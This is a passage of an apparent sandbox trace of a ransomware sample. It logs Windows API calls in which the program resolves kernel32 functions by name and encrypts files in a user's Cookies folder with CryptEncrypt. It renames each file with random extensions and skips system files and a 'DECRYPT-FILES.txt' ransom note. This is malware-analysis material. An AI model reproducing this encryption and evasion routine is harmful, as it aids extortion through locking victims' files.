lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.040] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.040] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.040] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.040] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.040] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.040] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.040] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.040] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.040] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.040] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.040] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.040] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.040] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.040] lstrlenA (lpString="DELETEATOM") returned 10 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.041] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.041] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.041] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.041] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.041] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.041] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.041] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.041] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.041] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.041] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.041] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.041] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.041] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.041] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.041] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.041] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.041] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.041] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.041] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.041] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.041] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.042] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.042] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.042] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.042] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.042] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.042] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.042] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.042] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.042] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.042] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.042] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.042] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.042] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.042] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.042] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.042] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.042] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.042] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.042] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.042] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.043] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.043] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.043] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.043] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J") returned 112 [0181.043] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J.BcZbh") returned 118 [0181.043] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ere4j"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J.BcZbh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ere4j.bczbh"), dwFlags=0x0) returned 1 [0181.044] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.044] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.044] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.044] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dcf9270, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1dcf9270, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab443aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", cAlternateFileName="5P5NRG~1.0VG")) returned 1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="DECRYPT-FILES.txt") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="autorun.inf") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="boot.ini") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="desktop.ini") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="ntuser.dat") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="iconcache.db") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="bootsect.bak") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="ntuser.dat.log") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="thumbs.db") returned -1 [0181.044] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR", lpString2="Bootfont.bin") returned -1 [0181.044] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR") returned 40 [0181.044] lstrcmpiW (lpString1="0VgwYR", lpString2="lnk") returned -1 [0181.045] lstrcmpiW (lpString1="0VgwYR", lpString2="exe") returned -1 [0181.045] lstrcmpiW (lpString1="0VgwYR", lpString2="sys") returned -1 [0181.045] lstrcmpiW (lpString1="0VgwYR", lpString2="dll") returned -1 [0181.045] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0181.045] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR") returned 40 [0181.045] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0181.045] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR" [0181.045] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0vgwyr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0181.045] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=350) returned 1 [0181.045] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0181.045] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.046] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.046] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.046] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.046] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0181.046] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.047] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.047] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.047] CloseHandle (hObject=0x280) returned 1 [0181.047] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.048] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0181.048] CloseHandle (hObject=0x0) returned 0 [0181.048] CloseHandle (hObject=0x27c) returned 1 [0181.048] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.049] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.049] GetTickCount () returned 0x1134b34 [0181.049] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.049] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.049] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.049] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.050] lstrlenA (lpString="kernel32.dll") returned 12 [0181.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.050] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.050] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.050] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.050] lstrlenA (lpString="ADDATOMA") returned 8 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.050] lstrlenA (lpString="ADDATOMW") returned 8 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.050] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.050] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.050] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.050] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.050] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.050] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.050] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.050] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.050] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.051] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.051] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.051] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.051] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.051] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.051] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.051] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.051] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.051] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.051] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.051] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.051] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.051] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.051] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.051] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.051] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.051] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.051] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.051] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") 